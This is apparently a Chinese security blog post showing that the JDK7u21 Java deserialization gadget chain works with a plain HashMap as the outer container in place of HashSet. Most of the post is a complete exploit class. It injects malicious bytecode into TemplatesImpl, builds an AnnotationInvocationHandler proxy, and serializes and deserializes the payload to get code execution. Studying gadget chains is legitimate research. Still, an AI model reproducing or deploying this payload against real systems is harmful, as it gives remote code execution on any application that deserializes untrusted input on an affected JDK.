今天在搞ROME HotSwappableTargetSource链的时候突然发现，JDK7U21反序列化链不仅HashMap.put触发了key.equals

putForCreate也调用了

而且HashMap.readObject直接调用了putForCreate来还原

what?直接向HashMap两个put不就完了，还搞什么HashSet

开弄！

java">package org.exploit.misc;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.shiro.crypto.hash.Hash;import javax.xml.transform.Templates;
import java.io.IOException;
import java.lang.reflect.*;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.LinkedHashSet;
import java.util.Map;public class JDK7u21_HashMap {public static void main(String[] args) throws Exception {byte[] code1 = Files.readAllBytes(Paths.get("E:\\CODE_COLLECT\\Idea_java_ProTest\\my-yso\\target\\classes\\RuntimeEvil.class"));TemplatesImpl templatesClass = new TemplatesImpl();Field[] fields = templatesClass.getClass().getDeclaredFields();for (Field field : fields) {field.setAccessible(true);if (field.getName().equals("_bytecodes")) {field.set(templatesClass, new byte[][]{code1});} else if (field.getName().equals("_name")) {field.set(templatesClass, "godown");} else if (field.getName().equals("_tfactory")) {field.set(templatesClass, new TransformerFactoryImpl());}}Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");Constructor constructor = clazz.getDeclaredConstructor(Class.class, Map.class);constructor.setAccessible(true);HashMap Annovar2map = new HashMap();Annovar2map.put("f5a5a608",templatesClass);InvocationHandler annotationInvocationHandler = (InvocationHandler) constructor.newInstance(Override.class, Annovar2map);Field typeField = annotationInvocationHandler.getClass().getDeclaredField("type");typeField.setAccessible(true);Map annoProxy = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(),new Class[]{Map.class},annotationInvocationHandler);HashMap annoset = new HashMap();annoset.put(annoProxy,"godown");annoset.put(templatesClass,"godown");typeField.set(annotationInvocationHandler, Templates.class);serialize(annoset);unserialize("ser.bin");}public static void serialize(Object obj) throws Exception{java.io.FileOutputStream fos = new java.io.FileOutputStream("ser.bin");java.io.ObjectOutputStream oos = new java.io.ObjectOutputStream(fos);oos.writeObject(obj);oos.close();}public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{java.io.FileInputStream fis = new java.io.FileInputStream(Filename);java.io.ObjectInputStream ois = new java.io.ObjectInputStream(fis);Object obj = ois.readObject();ois.close();return obj;}
}

所以JDK7u21最外层，用HashMap，HashSet，LinkedHashSet都是可以的